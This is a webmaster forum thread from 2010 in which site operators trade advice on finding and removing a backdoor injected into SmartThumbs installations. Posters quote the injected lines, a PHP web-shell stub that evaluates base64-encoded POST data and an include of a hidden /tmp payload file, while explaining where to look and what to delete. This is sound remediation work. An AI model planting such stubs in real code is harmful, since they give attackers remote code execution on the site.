Go Back   AskDamageX.com Webmaster Forum > General > Webmaster Business & Traffic Main Discussion

Reply
 
LinkBack Thread Tools
Old May 8th, 2010, 07:36 AM   #1 (permalink)
dlxer.com
 
Join Date: Dec 2007
Posts: 505
Default checking and removing ST exploit

I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually...

Porn X Space 4 Webmasters Blog Archive Remove SmartThumbs exploit in 5 steps
__________________


dlXer - Adult design, coding and hosting. ST/STP, TradePulse
MMarko is offline   Reply With Quote
Old May 8th, 2010, 07:50 AM   #2 (permalink)
Hello.
 
FrozenJag's Avatar
 
Join Date: Nov 2006
Location: US
Posts: 5,502
Default

Dude.

Thank you so much for this. I'm pretty sure mine are good but now I can be 100%

I appreciate it!
__________________
I dont give a lovely mother fuck.
FrozenJag is offline   Reply With Quote
Old May 8th, 2010, 08:14 AM   #3 (permalink)
Capo di tutti capi
 
boneless's Avatar
 
Join Date: Oct 2005
Location: Rotterdam
Posts: 3,761
Default

yellowfiber is checking for me as i did find those lines in there, they just tried to include a different file called webcams.tmp
__________________
icq 14857306
skype dabone2
boneless is offline   Reply With Quote
Old May 8th, 2010, 09:03 AM   #4 (permalink)
dlxer.com
 
Join Date: Dec 2007
Posts: 505
Default

Once those are gone you will see increase in traffic for sure...
__________________


dlXer - Adult design, coding and hosting. ST/STP, TradePulse
MMarko is offline   Reply With Quote
Old May 8th, 2010, 09:48 PM   #5 (permalink)
Richest man in Babylon
 
Shoplifter's Avatar
 
Join Date: Oct 2005
Posts: 579
Default

I had ases.tmp on one of my servers. Any idea just how much traffic was lost to this exploit?
Shoplifter is offline   Reply With Quote
Old May 9th, 2010, 04:33 AM   #6 (permalink)
Traffic Guru
 
Join Date: Mar 2007
Posts: 345
Default

where exactly do you look to see if you have the exploit? I know I have tgps that need updating to latest version but evertime I do this my files get chmod to 777 when it needs to be 755 with my hosts, so have to change permissions all over again!

Basically I don't want to run something that was not needed in the first place if there is no exploit, cos knowing my luck I will mess it up! lol
smoothballs is offline   Reply With Quote
Old May 9th, 2010, 07:38 AM   #7 (permalink)
LifestyleAmateurs.com
 
nation-x's Avatar
 
Join Date: Oct 2005
Location: Rock Hill, SC
Posts: 8,926
Default

I haven't found any .tmp files... but I did find that @eval code in a bunch of my sites variables.php
nation-x is offline   Reply With Quote
Old May 9th, 2010, 12:06 PM   #8 (permalink)
dlxer.com
 
Join Date: Dec 2007
Posts: 505
Default

Quote:
Originally Posted by smoothballs View Post
where exactly do you look to see if you have the exploit?
just open in text editor file st/admin/variables.php
__________________


dlXer - Adult design, coding and hosting. ST/STP, TradePulse
MMarko is offline   Reply With Quote
Old May 9th, 2010, 12:07 PM   #9 (permalink)
dlxer.com
 
Join Date: Dec 2007
Posts: 505
Default

Quote:
Originally Posted by Shoplifter View Post
I had ases.tmp on one of my servers. Any idea just how much traffic was lost to this exploit?
I guess they skimmed under 10% percent of clicks...
__________________


dlXer - Adult design, coding and hosting. ST/STP, TradePulse
MMarko is offline   Reply With Quote
Old May 9th, 2010, 12:15 PM   #10 (permalink)
Traffic Guru
 
JefersoN's Avatar
 
Join Date: Mar 2007
Posts: 348
Default

hello, I just found this on one of my ST varaiables
is this include normal?

@include_once('/tmp/ases.tmp');
if not, how can i remove all files?
__________________
Looking for quality thumbs/text trades? 15k+? hit me up.. mature, MILF, shemale, BBW, interracial, big tits, bondage and general sites...


Last edited by JefersoN; May 9th, 2010 at 12:18 PM.
JefersoN is offline   Reply With Quote
Old May 9th, 2010, 12:17 PM   #11 (permalink)
Traffic Guru
 
Join Date: Oct 2005
Posts: 263
Default

that is not normal ... remove the line and delete the file then upgrade to latest version.

i also have that line only on my variables.php
blackrose is offline   Reply With Quote
Old May 9th, 2010, 12:42 PM   #12 (permalink)
Richest man in Babylon
 
Shoplifter's Avatar
 
Join Date: Oct 2005
Posts: 579
Default

Many thanks for this info MMarko...

In my case I had quite a few infected sites as I had not updated my ST since they put in the rewrite functions in June of 2009. My newer sites were not hit.

I found updating and then saving the general settings cleaned the variables.php file. I checked a few databases after with PHPMyAdmin and the niche columns were ok, so I am thinking the upgrade clears this too. I deleted the .tmp files by hand. In my case the .tmp files had quite a few different names but were always 4 characters long.
Shoplifter is offline   Reply With Quote
Old May 9th, 2010, 01:21 PM   #13 (permalink)
Traffic Guru
 
Join Date: Mar 2007
Posts: 345
Default

Quote:
Originally Posted by MMarko View Post
just open in text editor file st/admin/variables.php
yeah thats what I started doing after reading nation x post so far so good

Cheers
smoothballs is offline   Reply With Quote
Old May 10th, 2010, 03:55 AM   #14 (permalink)
Movie-Traffic.com
 
Dan S's Avatar
 
Join Date: Oct 2005
Posts: 1,522
Default

Yikes, first time I have been affected too
__________________
Dan S is offline   Reply With Quote
Old May 10th, 2010, 04:28 AM   #15 (permalink)
Serious Contributor
 
Join Date: Oct 2005
Location: Somewhere On Planet Earth
Posts: 1,158
Default

I dont have that "sesa.temp" but I have this one:

$niche='1';@eval(base64_decode($_POST[qxp]));//';

should that one line be deleted then ?
FoZzI is offline   Reply With Quote
Old May 10th, 2010, 06:05 AM   #16 (permalink)
LifestyleAmateurs.com
 
nation-x's Avatar
 
Join Date: Oct 2005
Location: Rock Hill, SC
Posts: 8,926
Default

Quote:
Originally Posted by FoZzI View Post
I dont have that "sesa.temp" but I have this one:

$niche='1';@eval(base64_decode($_POST[qxp]));//';

should that one line be deleted then ?
just this part

@eval(base64_decode($_POST[qxp]));//';
nation-x is offline   Reply With Quote
Old May 10th, 2010, 03:35 PM   #17 (permalink)
dlxer.com
 
Join Date: Dec 2007
Posts: 505
Default

and you have to clean tables in database too! since ST is taking values for variables.php from table st_settings
__________________


dlXer - Adult design, coding and hosting. ST/STP, TradePulse
MMarko is offline   Reply With Quote
Old May 11th, 2010, 10:47 AM   #18 (permalink)
Serious Contributor
 
Join Date: Sep 2006
Location: Ny
Posts: 629
Default

shit found @include_once('/tmp/ases.tmp');
__________________
Try Shinymovies.com and Shinyangels.com from Cashlantis.com!
cybermike is offline   Reply With Quote
Old May 11th, 2010, 11:41 AM   #19 (permalink)
LifestyleAmateurs.com
 
nation-x's Avatar
 
Join Date: Oct 2005
Location: Rock Hill, SC
Posts: 8,926
Default

Quote:
Originally Posted by cybermike View Post
shit found @include_once('/tmp/ases.tmp');
oy vey
nation-x is offline   Reply With Quote
Old May 12th, 2010, 08:13 AM   #20 (permalink)
Traffic Guru
 
Join Date: Oct 2005
Posts: 263
Default

look for this file as well...

/tmp/.ICE-unix/ases.tmp
blackrose is offline   Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

All times are GMT -7. The time now is 07:42 AM.



Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0